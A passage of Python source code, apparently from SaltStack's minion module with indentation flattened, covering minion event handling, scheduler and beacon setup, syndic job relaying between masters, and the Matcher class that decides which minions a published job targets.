Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This %s was scheduled to stop. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
elif self._running is True:
log.error(
'This %s is already running. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
try:
log.info(
'%s is starting as user \'%s\'',
self.__class__.__name__, salt.utils.user.get_user()
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.platform.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting %s',
self.__class__.__name__,
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug(
'Minion of \'%s\' is handling event tag \'%s\'',
self.opts['master'], tag
)
if tag.startswith('module_refresh'):
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
elif tag.startswith('pillar_refresh'):
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False)
)
elif tag.startswith('beacons_refresh'):
self.beacons_refresh()
elif tag.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif tag.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif tag.startswith('grains_refresh'):
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif tag.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif tag.startswith('_minion_mine'):
self._mine_send(tag, data)
elif tag.startswith('fire_master'):
if self.connected:
log.debug('Forwarding master event tag=%s', data['tag'])
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif tag.startswith(master_event(type='disconnected')) or tag.startswith(master_event(type='failback')):
# if the master disconnect event is for a different master, raise an exception
if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
# not mine master, ignore
return
if tag.startswith(master_event(type='failback')):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master'][0]:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
log.info('Connection to master %s lost', self.opts['master'])
if self.opts['master_type'] != 'failover':
# modify the scheduled job to fire on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
# delete the scheduled job to don't interfere with the failover process
if self.opts['transport'] != 'tcp':
self.schedule.delete_job(name=master_event(type='alive'))
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=tag.startswith(master_event(type='failback')))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info(
'Re-initialising subsystems for new master %s',
self.opts['master']
)
# put the current schedule into the new loaders
self.opts['schedule'] = self.schedule.option('schedule')
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# make the schedule to use the new 'functions' loader
self.schedule.functions = self.functions
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name=master_event(type='failback'),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='failback'), persist=True)
else:
self.restart = True
self.io_loop.stop()
elif tag.startswith(master_event(type='connected')):
# handle this event only once. otherwise it will pollute the log
# also if master type is failover all the reconnection work is done
# by `disconnected` event handler and this event must never happen,
# anyway check it to be sure
if not self.connected and self.opts['master_type'] != 'failover':
log.info('Connection to master %s re-established', self.opts['master'])
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
elif tag.startswith('__schedule_return'):
# reporting current connection with master
if data['schedule'].startswith(master_event(type='alive', master='')):
if data['return']:
log.debug(
'Connected to master %s',
data['schedule'].split(master_event(type='alive', master=''))[1]
)
self._return_pub(data, ret_cmd='_return', sync=False)
elif tag.startswith('_salt_error'):
if self.connected:
log.debug('Forwarding salt error event tag=%s', tag)
self._fire_master(data, tag)
elif tag.startswith('salt/auth/creds'):
key = tuple(data['key'])
log.debug(
'Updating auth data for %s: %s -> %s',
key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']
)
salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds']
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.platform.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
def _setup_core(self):
'''
Set up the core minion attributes.
This is safe to call multiple times.
'''
if not self.ready:
# First call. Initialize.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.grains_cache = self.opts['grains']
self.ready = True
def setup_beacons(self, before_connect=False):
'''
Set up the beacons.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'beacons' not in self.periodic_callbacks:
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
new_periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(
handle_beacons, loop_interval * 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_beacons()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
def setup_scheduler(self, before_connect=False):
'''
Set up the scheduler.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'schedule' not in self.periodic_callbacks:
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
utils=self.utils,
cleanup=[master_event(type='alive')])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
new_periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_schedule()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'%s\' trying to tune in', self.opts['id'])
if start:
if self.opts.get('beacons_before_connect', False):
self.setup_beacons(before_connect=True)
if self.opts.get('scheduler_before_connect', False):
self.setup_scheduler(before_connect=True)
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
if HAS_WIN_FUNCTIONS:
salt.utils.win_functions.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
self.setup_beacons()
self.setup_scheduler()
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
def ping_timeout_handler(*_):
if self.opts.get('auth_safemode', False):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay %ss', delay)
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
self._fire_master('ping', 'minion_ping', sync=False, timeout_handler=ping_timeout_handler)
except Exception:
log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000)
self.periodic_callbacks['ping'].start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when minion sees something it shouldnt
log.trace(
'Broadcast message received not for this minion, Load: %s',
payload['load']
)
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: %s', args[1])
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# old style event. Defaults to false in Neon Salt release.
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
# List of delayed job_rets which was unable to send for some reason and will be resend to
# any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
failed = False
while True:
log.debug(
'Syndic attempting to connect to %s',
opts['master']
)
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master(failed=failed)
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info(
'Syndic successfully connected to %s',
opts['master']
)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up syndic for multi-syndic. Is the '
'master at %s responding?', opts['master']
)
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
failed = True
log.critical(
'Unexpected error while connecting to %s',
opts['master'], exc_info=True
)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
# TODO: debug?
log.info(
'Attempting to mark %s as dead, although it is already '
'marked dead', master
)
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
successful = False
# Call for each master
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
successful = True
except SaltClientError:
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
if not successful:
log.critical('Unable to call %s on any masters!', func)
def _return_pub_syndic(self, values, master_id=None):
'''
Wrapper to call the '_return_pub_multi' a syndic, best effort to get the one you asked for
'''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'%s\' trying to tune in', self.opts['id'])
# register the event sub to the poller
self.job_rets = {}
self.raw_events = []
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event %s', mtag) # pylint: disable=no-member
tag_parts = mtag.split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self._return_retry_timer(),
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = list(six.itervalues(self.job_rets[master]))
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: %s', matcher)
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(six.text_type(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.data.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
# Target is an address?
tgt = ipaddress.ip_address(tgt)
except: # pylint: disable=bare-except
try:
# Target is a network?
tgt = ipaddress.ip_network(tgt)
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target: %s', tgt)
return []
proto = 'ipv{0}'.format(tgt.version)
grains = self.opts['grains']
if proto not in grains:
match = False
elif isinstance(tgt, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
match = six.text_type(tgt) in grains[proto]
else:
match = salt.utils.network.in_subnet(tgt, grains[proto])
return match
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: %s', exc)
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
nodegroups = self.opts.get('nodegroups', {})
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: %s ? %s', self.opts['id'], tgt)
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
# we make a shallow copy in order to not affect the passed in arg
words = tgt[:]
while words:
word = words.pop(0)
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": %s', word)
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: %s', word)
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# if we encounter a node group, just evaluate it in-place
decomposed = salt.utils.minions.nodegroup_comp(target_info['pattern'], nodegroups)
if decomposed:
words = decomposed + words
continue
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error(
'Unrecognized target engine "%s" for target '
